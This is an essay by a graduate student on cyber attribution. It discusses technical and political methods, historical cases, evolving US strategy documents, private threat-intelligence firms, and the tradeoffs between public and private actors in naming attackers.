The Evolution of Cyber Attribution

By  | 

Cyber attribution seeks to determine the responsibility for cyberspace operations. As with real world violence, the process of attribution includes both technical and political assessments. Technical methods include analyses of malware and routines that tie cyber effect operations to known actors. Political methods are closely aligned to intelligence collection, analysis, and the political decisions that tie into decisions of whether or not to publicly attribution operations.

Despite their similarities, attributing cyberspace operations is not quite the same as attributing physical attacks. Most importantly, actors are more capable of hiding their identities in cyberspace. They can impersonate other computers, use virtual private networks to complicate surveillance, or hijack other devices to undertake operations. Additionally, a significant operation can remain undiscovered for significant periods of time, such as the SolarWinds campaign which lasted for nine months before being reported by FireEye in November 2020.

The process is especially difficult when policymakers demand very precise attribution. In some cases, it might not be enough to point the finger at a rival state, especially if the goal is to build a legal case or to share the kind of information that will convince partners to work together against a common threat. Very specific attribution can trace attacks back to specific malware, machines, individuals, and organizations. Such details are difficult to acquire, and they may require a combination of reverse engineering, law enforcement investigations, and intelligence.

JD Work, a professor at the National Defense University, described to me some of the pitfalls that can arise while increasing specificity. He stressed that analysts must be humble about the weight of inference from any piece of information. It takes time and persistence to accumulate enough data to offer a confident attribution. While traditional intelligence faces similar issues, attribution of cyber operations has additional challenges because of the opportunities to mask one’s own identity or appear as someone else.

The requirements of attribution depend on the type of cyberspace operation in question. The severity of an operation changes policymakers’ calculations on how many resources they want to use on attributing an attack. Those that cause significant damages, such as sabotage, are more likely to have significant resource investments. However, it is unclear to policymakers what level of investment should be made because the tactics, techniques, and procedures (TTPs) of beginning cyber operations are the same until a payload has been activated. This limits the ability of states to make decisions on resource investment before an operation has occurred.

       Observers have raised important concerns about delayed attribution and misattribution. The ability to hide and disguise malware sometimes makes it difficult for technical specialists to make conclusions with high confidence. The process takes longer when officials worry about improper attribution. Such concerns have a long history. In 1998, for example, hackers took control of more than 500 government and private computer systems. The Clinton administration suspected Iraq was responsible, given the event’s proximity to U.S. strikes on Baghdad. However, it was discovered that the culprits were two teenagers from California and one from Israel. Despite these concerns, there have also been many successful examples of cyber attribution. The Obama administration blamed North Korea for hacking Sony Pictures in 2014 and the Muller Report found Russia at fault for hacking the Hilary Clinton’s presidential campaign in 2016. The battle between clandestine hackers and cyber defense is not one sided.

Government and Private Sector Approaches

Indeed, many techniques have been developed to overcome these problems and enable timely and accurate attribution. Technical measures include storing logs, using honeypots, using intrusion detection systems (IDS) or intrusion prevention systems (IPS), surveilling attackers, and reversing the flow of data. There is significant overlap between measures typically used for network defense, such as IDS and IDP, and those used for intelligence purposes. Network defense measures are used to alert administrators to unusual actions or behaviors that may be putting information security at risk. These are critical to understanding that an operation may be occurring but cannot be used alone to attribute who is responsible. Technical intelligence such as honeypots or reversing the flow of data allows actors to gain further information behind the individuals or groups who are undertaking these operations.

Since 2015, the US Government (USG) has presented a variety of approaches regarding attribution in its strategies. According to the 2015 Cyber Strategy, the Department of Defense (DoD) had “invested heavily” in intelligence, attribution, and warning capabilities. Following this, a flurry of federal strategies were released in 2017 and 2018 that touched, or notably did not touch, on attribution – DoD, the National Cyber Strategy, DHS, and the National Security Strategy.

The DoD Cyber Strategy did not mention attribution at all, despite the strong focus only three years prior. This is because this strategy aims to “preempt, defeat, or deter malicious cyber activity targeting U.S. critical infrastructure that could cause a significant cyber incident.” The National Cyber Strategy centered the use of attribution on increasing deterrence measures and prioritized the intelligence community in attributing attacks. The DHS Cyber Strategy prioritized providing information about attribution to those affected by cyber effect operations. Finally, the National Security Strategy placed improving attribution under its “Priority Actions” and echoed the DHS message on intelligence sharing. The 2022 National Security Strategy mentions attribution only in reference to “countering intellectual property theft, forced technology transfer, and other attempts to degrade our technological advantages”.

Most recently, the 2023 National Cyber Strategy does not mention attribution by name outside of “diplomatic initiatives attributing disruptive, destructive, or otherwise destabilizing cyber activities.” This document prioritizes the response to actions, most importantly cybercrime, and seems to take the understanding of who is responsible as a given at this point. The differences between these strategies displays the differences in perspective between agencies and the leaders at a given time. The first difference is that, as public-private collaboration is stressed in this most recent National Cyber Strategy, the USG and private sector have different incentives driving their decisions to publicly attribute operations. These differences require effort from leaders on both sides to align their efforts to ensure they are undertaken for the public interest. Next, a running theme through these strategies is the efforts and place of intelligence, both through the intelligence community and through the private sector, in attribution. While technical methods are key sources of information, the USG seems to be updating its view to include other outside sources of intelligence for its decisions. Finally, each strategy gives a unique insight into the goals, purposes, and priorities of a department, agency, or administration. The work done by the DOD differs from DHS and that is seen in how they want to support and use efforts surrounding attribution. This is also seen even between the 2018 and 2023 National Cyber Strategies as attribution has become significantly less of a focus between these two documents.

The private sector has been instrumental in advancing attribution efforts, specifically four major firms: Crowdstrike, Mandiant, Microsoft, and Recorded Future. Each of these firms handles intelligence in different ways. Crowdstrike’s use of intelligence depends on whether or not they believe the operations to be state-sponsored. They exclusively rely on technical analysis for non-state-sponsored operations whereas include geopolitical factors for actors that they believe could be state-sponsored. Mandiant does not designate between actors which are state-sponsored or not, instead focusing on intelligence at the tactical, operational, and strategic levels. Microsoft is clear that it includes geopolitics in its analysis because “there is no organization that can present a politically-neutral and fact-based analysis” when examining accusations of state-sponsored cyber operations. Recorded Future varies from these other companies by focusing on machine learning and data instead of including political implications. An additional factor that Crowdstrike uses is open-source intelligence (OSINT). They include the use of the deep and dark web, social media, and underground communities to gather additional data for attribution. However, Work discussed that OSINT is used by all commercial threat intelligence agencies, at least according to the US government. This is because the US government categorizes all intelligence from these entities as OSINT.

Efforts to undertake attribution require collaboration between the public and private sectors because of their relative strengths. The USG has access to information and tools that are not publicly available. However, concerns about maintaining TTPs and classification can cause issues for public attribution. Additionally, the USG does not have the same visibility to operations affecting the private sector like those mentioned above. The private sector is able to gain a more complete understanding of the threat landscape because of their corporate relationships that mitigate worries about public disclosure of breaches. The 2023 National Cyber Strategy has recognized that this collaboration is critical when it designated Strategic Objective 1.2 as scaling public-private collaboration and 2.2 as enhancing public-private operational collaboration to disrupt adversaries. Time will tell if efforts are able to better coordinate public-private information sharing to reveal those behind cyberspace operations.

Despite the massive amount of information available, institutional factors change the considerations for actors publicly attributing operations. Law enforcement faces the most challenges for publicly attributing operations because of the legal burden of proof that is required for an indictment to be made in court in comparison to claims made by a private sector company or even a government official. Government officials and private companies do not have a requirement to reach before they can make statements whereas law enforcement must currently have evidence to convince over 50 percent of a grand jury that "a federal crime has probably been committed by the person accused.” They have an additional aversion to approaching case that they do not know they have the evidence to win. These standards increase the barriers for law enforcement to attribute crimes.

While law enforcement has the highest requirements, political attribution remains much more difficult than considerations for private sector actors. Decisionmakers must weigh the benefits of attributing an operation against both the geopolitical implications of doing so and the risks of exposing the use of classified TTPs. Dr. Emily Goldman, Cyber Strategist in the Directorate of Operations at US Cyber Command, told me in an interview that even in situations where an attack could be technically attributed, the decision could be made not to do so in order to preserve TTPs. These decisions are only made more complicated the USG decides to undertake international collective attribution, where multiple governments collaborate to publicly attribute an operation.

States may differ in their opinion of what level attribution is necessary. Dr. Goldman discussed that some states may want to know the individual responsible for an attack, as mentioned above, while others are content to say that actors coming from within one’s sovereign territory is enough to place the blame on the hosting state. Those with the later belief would argue that it is a state’s responsibility to apprehend the individuals or request international assistance if they are incapable of doing so.

In comparison to law enforcement and political decisions, the private sector has the most freedom to publicly attribute cyberspace operations. Despite this apparent freedom, firms still have decisions to make, specifically regarding attribution in countries where they do business. Work mentioned in his interview that these considerations may lead to hesitance of attribution in the future, especially as commercial cybersecurity firms are purchased by big tech companies.


Technical and political tools make attribution possible, and public-private collaboration can help improve the speed of discovery. New and unique cyber forensic techniques used by private sector cybersecurity firms may complement official assessments that are supported by other sources of information. That said, public-private collaboration may be hampered by governmental concerns about revealing sources and methods. States and firms each have their own reasons for calling out hackers in public – or keeping their judgments to themselves. These reasons change over time, but public-private collaboration can assist in aligning interests to make the public good a primary motivator. Malicious actors may find it harder to hide as attribution capabilities become more advanced, but the decision to reveal their identities is likely to remain fraught. Decisions about attribution, a highly technical enterprise, often rely on old-fashioned political tradeoffs.



About the Author: 

Jake Sepich is a current graduate student in the School of International Service’s United States Foreign Policy and National Security program. Their research interests include cybersecurity, both in its ethics and how it will affect the future of warfare.